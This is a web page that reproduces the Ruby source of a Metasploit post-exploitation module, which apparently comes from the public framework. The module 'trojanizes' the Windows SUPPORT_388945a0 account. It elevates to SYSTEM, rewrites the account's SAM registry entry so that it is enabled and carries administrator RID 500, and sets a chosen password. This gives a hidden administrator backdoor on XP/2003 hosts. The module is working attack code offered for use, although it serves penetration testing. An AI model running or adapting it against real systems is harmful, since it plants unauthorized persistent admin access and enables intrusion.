Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/post/windows/manage/enable_support_account.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::Windows::Registry7include Msf::Post::Windows::Priv89def initialize(info = {})10super(11update_info(12info,13'Name' => 'Windows Manage Trojanize Support Account',14'Description' => %q{15This module enables alternative access to servers and workstations16by modifying the support account's properties. It will enable17the account for remote access as the administrator user while18taking advantage of some weird behavior in lusrmgr.msc. It will19check if sufficient privileges are available for registry operations,20otherwise it exits.21},22'License' => MSF_LICENSE,23'Author' => 'salcho <salchoman[at]gmail.com>',24'Platform' => [ 'win' ],25'SessionTypes' => [ 'meterpreter' ],26'References' => [ 'http://xangosec.blogspot.com/2013/06/trojanizing-windows.html' ],27'Compat' => {28'Meterpreter' => {29'Commands' => %w[30priv_elevate_getsystem31]32}33}34)35)3637register_options(38[39OptString.new('PASSWORD', [true, 'Password of the support user account', 'password']),40OptBool.new('GETSYSTEM', [true, 'Attempt to get SYSTEM privilege on the target host.', false])41]42)43end4445def run46reg_key = 'HKLM\\SAM\\SAM\\Domains\\Account\\Users'4748unless is_system?49if datastore['GETSYSTEM']50print_status('Trying to get system...')51res = session.priv.getsystem52if res[0]53print_good('Got system!')54else55print_error('Unable to get system! You need to run this script.')56return57end58else59print_error('You need to run this script as system!')60return61end62end6364version = get_version_info65unless version.build_number.between?(Msf::WindowsVersion::XP_SP0, Msf::WindowsVersion::Server2003_SP2)66print_error("#{version.product_name} is not supported")67return68end6970print_status("Target OS is #{version.product_name}")71names_key = registry_enumkeys(reg_key + '\\Names')72unless names_key73print_error("Couldn't access registry keys")74return75end7677rid = -178print_status('Harvesting users...')79names_key.each do |name|80next unless name.include? 'SUPPORT_388945a0'8182print_good("Found #{name} account!")83skey = registry_getvalinfo(reg_key + "\\Names\\#{name}", '')84if !skey85print_error("Couldn't open user's key")86return87end88rid = skey['Type']89print_status("Target RID is #{rid}")90end9192if rid == -193print_error("Couldn't get user's RID...")94return95end9697users_key = registry_enumkeys(reg_key)98users_key.each do |r|99next if r.to_i(16) != rid100101f = registry_getvaldata(reg_key + "\\#{r}", 'F')102if check_active(f)103print_status('Account is disabled, activating...')104f[0x38] = ['10'].pack('H')105else106print_error('Target account is already enabled')107end108109print_status('Swapping RIDs...!')110# Overwrite RID to 500 (as administrator)111f = swap_rid(f, 500)112113open_key = registry_setvaldata(reg_key + "\\#{r}", 'F', f, 'REG_BINARY')114unless open_key115print_error("Can't write to registry... Something's wrong!")116return117end118119print_status("Setting password to #{datastore['PASSWORD']}")120cmd = cmd_exec('cmd.exe', "/c net user support_388945a0 #{datastore['PASSWORD']}")121vprint_status(cmd.to_s)122end123end124125def check_active(f)126if f[0x38].unpack('H*')[0].to_i == 11127return true128else129return false130end131end132133def swap_rid(f, rid)134# This function will set hex format to a given RID integer135hex = [('%04x' % rid).scan(/.{2}/).reverse.join].pack('H*')136# Overwrite new RID at offset 0x30137f[0x30, 2] = hex138return f139end140end141142143